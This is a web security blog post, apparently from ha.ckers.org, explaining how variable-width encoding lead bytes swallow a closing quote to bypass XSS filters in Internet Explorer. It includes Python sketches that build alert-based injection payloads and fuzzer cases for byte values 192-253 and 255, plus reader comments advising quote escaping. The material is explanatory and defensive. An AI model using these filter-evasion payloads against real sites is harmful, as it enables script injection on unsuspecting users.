web application security lab

Variable Width Encoding

Just when you thought it was safe to jump back into the web security development waters, something like this comes along. One of the things I’ve mentioned several times in my posts is that even once you figure out all this XSS stuff, you still need to make sure you have the proper encoding methods. My particular encoding method of choice is UTF-8. Then I read Cheng Peng Su’s explanation of filter evasion using variable-width encodings and my world shook for a moment. Truly shook.

Previously there were certain things you could assume were safe. Like, let’s say, an ALT attribute in an image tag. The user should be allowed to enter anything they like in an ALT attribute, except the dreaded double quote that would jump them out of encapsulation. Well, the way multi-byte encodings work, several bytes are combined into one character. So if you butt a certain lead byte up against another byte, the pair renders as a single third character in the browser. Guess what: a double quote is accepted as a valid second byte. So if you put one of those lead bytes directly before the closing double quote, that double quote turns into a meaningless third character and the attribute stays open, which keeps you encapsulated. Why is that good for an attacker? Because we DO allow double quotes outside of the tags, because we are nice people and we like it when people can quote things. When they put their own quote in after what we think is the end of the tag, that quote is the one that actually closes the attribute, so whatever follows it has jumped out of the encapsulation but is still within the realm of a valid HTML tag.
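The swallowing effect described above can be sketched in Python. This is a toy model, not Internet Explorer's actual decoder: `lenient_decode` and `alt_value` are hypothetical helpers, and the rule that any byte in the 0xC0-0xFD range consumes the byte after it is an assumption made purely for illustration. Python's own strict UTF-8 decoder is shown for contrast.

```python
REPLACEMENT = "\ufffd"  # stand-in for the "meaningless third char"


def lenient_decode(data: bytes) -> str:
    """Toy decoder (assumption): a byte in 0xC0-0xFD swallows the next byte."""
    out = []
    i = 0
    while i < len(data):
        byte = data[i]
        if 0xC0 <= byte <= 0xFD and i + 1 < len(data):
            out.append(REPLACEMENT)  # lead byte + following byte become one char
            i += 2
        else:
            out.append(chr(byte))
            i += 1
    return "".join(out)


def alt_value(markup: str) -> str:
    """Return the text between ALT=" and the next double quote."""
    start = markup.index('ALT="') + len('ALT="')
    return markup[start:markup.index('"', start)]


# 0xC0 sits directly before the quote that was meant to close the ALT value.
payload = b'<IMG src="" ALT="XSS\xc0"> XSS" onerror=alert(1)">'

strict = payload.decode("utf-8", errors="replace")
lenient = lenient_decode(payload)

print(repr(alt_value(strict)))   # quote survives; the attribute ends where the filter expected
print(repr(alt_value(lenient)))  # quote swallowed; the attribute runs on to the user's own quote
```

In the lenient model the `onerror` handler ends up as an attribute of the tag rather than as harmless text after it.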

It’s all very confusing so I should probably give you an example. Click here in Internet Explorer. Excuse all the alert boxes, but they will show you which characters work for this. (It should also be noted that you actually don’t need the end angle bracket if you start another quote. It will just mess up the HTML, but for the purpose of the fuzzer output I had to put it in to keep it readable.) It appears that byte values 192-253 and 255 all act as suitable starting bytes of a double-byte character to jump out of quotes in UTF-8. As Cheng points out, this is not limited to just UTF-8, but also applies to GB2312, GB18030, BIG5, EUC-KR, EUC-JP, and SHIFT_JIS, although I think UTF-8 is by far the worst offender because of its prevalence, even if it only affects Internet Explorer. There’s a lot more research to be done here, with other chars and other encoding methods, but this is a fantastic start.
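A set of fuzzer test cases like the one described above could be generated along these lines. This is only a sketch, not the fuzzer used for the demo: `candidate_lead_bytes`, `build_case`, `quote_survives_strict_decode`, and the exact markup layout (modelled on the IMG/ALT example) are assumptions. It also runs each case through Python's strict UTF-8 decoder, which keeps the closing quote intact instead of merging it with the preceding byte.

```python
def candidate_lead_bytes() -> list[int]:
    """Byte values the post reports as working: 192-253 and 255."""
    return list(range(192, 254)) + [255]


def build_case(lead: int) -> bytes:
    """Build one test case with `lead` butted up against the closing quote (hypothetical layout)."""
    label = str(lead).encode("ascii")
    return (
        b'<IMG src="" ALT="XSS' + bytes([lead]) + b'"> XSS" onerror=alert('
        + label + b')">' + label
    )


def quote_survives_strict_decode(case: bytes) -> bool:
    """True if a strict UTF-8 decoder keeps the quote that closes the ALT value."""
    text = case.decode("utf-8", errors="replace")
    return '"> XSS' in text


cases = [build_case(lead) for lead in candidate_lead_bytes()]
print(len(cases), "test cases")
print(all(quote_survives_strict_decode(case) for case in cases))
```

Each case carries its own byte value in the alert, so a browser that fires the handler reveals which starting byte got through.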

This is a very scary and very real possible exploit for any site that allows things like images with additional ALT parameters or inline style tags of any kind. This could have impacts all over the place. I will be curious to see how this plays out with the search engines (what encodings they are vulnerable to if any) for the blackhat SEO world. I applaud Cheng for finding this. It’s very easy to exploit if you know what you’re doing and very difficult to prevent.

6 Responses to “Variable Width Encoding”

  1. Edward Z. Yang Says:

    Well, if you’re escaping stray quotation marks inside and OUTSIDE of attributes (as the spec requires), this shouldn’t be a problem, because then you’d end up with:

    <IMG src="" ALT="XSS[char]"> XSS&quot; onerror=alert('54')&quot;>54
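The escaping described in this comment can be sketched with Python's standard `html.escape`. This is a minimal illustration, assuming user text is escaped the same way whether it lands inside an attribute or in the page body; `render_image_with_caption` is a hypothetical helper, not code from any application discussed here.

```python
import html


def render_image_with_caption(alt_text: str, caption: str) -> str:
    """Escape quotes both inside the ALT attribute and in the text after the tag."""
    safe_alt = html.escape(alt_text, quote=True)
    safe_caption = html.escape(caption, quote=True)  # quotes escaped outside the tag too
    return f'<IMG src="" ALT="{safe_alt}"> {safe_caption}'


markup = render_image_with_caption("XSS", 'XSS" onerror=alert(54)">54')
print(markup)
```

Even if a lenient decoder swallowed the attribute's closing quote, the text after the tag would contain no raw double quote to close it again.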

  2. RSnake Says:

    You’re absolutely right, if you know to escape quotes inside and outside, although I haven’t seen a lot of applications that do it outside of tags, and before I couldn’t think of a valid reason to do it other than for sheer paranoia (or if you wanted to make an argument that it may be used for SQL Injection I could handle that), but now it finally makes sense as to why you really should do it.

    Oh, and by the way, I had to modify your post quite a bit to get it to render properly, hope that’s okay.

  3. Edward Z. Yang Says:

    That’s fine, I was wondering why my comment was looking a bit strange.

  4. Albert Says:

    Wow, this was neat ^^ A new vector to add, and a proof of concept that complexity just creates more holes in existing apps.

  5. ha.ckers.org web application security lab - Archive » XSSFuzz Released Says:

    […] Well, I am finally doing it, I’m releasing my stupid XSS fuzzer (duly named XSSFuzz). I’ve talked about it, fretted about it, and hated it long enough, and now it’s time to let you see for yourself how crappy it is. Yup, this is just about the worst contribution I’ve ever made to the web application security field, but it does have one valuable purpose. It’s particularly useful for identifying variable width encoding issues - a part of XSS that has had not nearly enough research done. Here’s the XSSFuzz screenshot. […]

  6. Top Web Hacks of 2006 » Hack Report Says:

    […] 1. Web Browser Intranet Hacking / Port Scanning - (with JavaScript and with HTML-only and the improved model) 2. Internet Explorer 7 “mhtml:” Redirection Information Disclosure 3. Anti-DNS Pinning and Circumventing Anti-Anti DNS pinning 4. Web Browser History Stealing - (with CSS, evil marketing, JS login-detection, and authenticated images) 5. Backdooring Media Files (QuickTime, Flash, PDF, Images, Word [2], and MP3’s) 6. Forging HTTP request headers with Flash 7. Exponential XSS 8. Encoding Filter Bypass (UTF-7, Variable Width, US-ASCII) 9. Web Worms - (AdultSpace, MySpace, Xanga) 10. Hacking RSS Feeds […]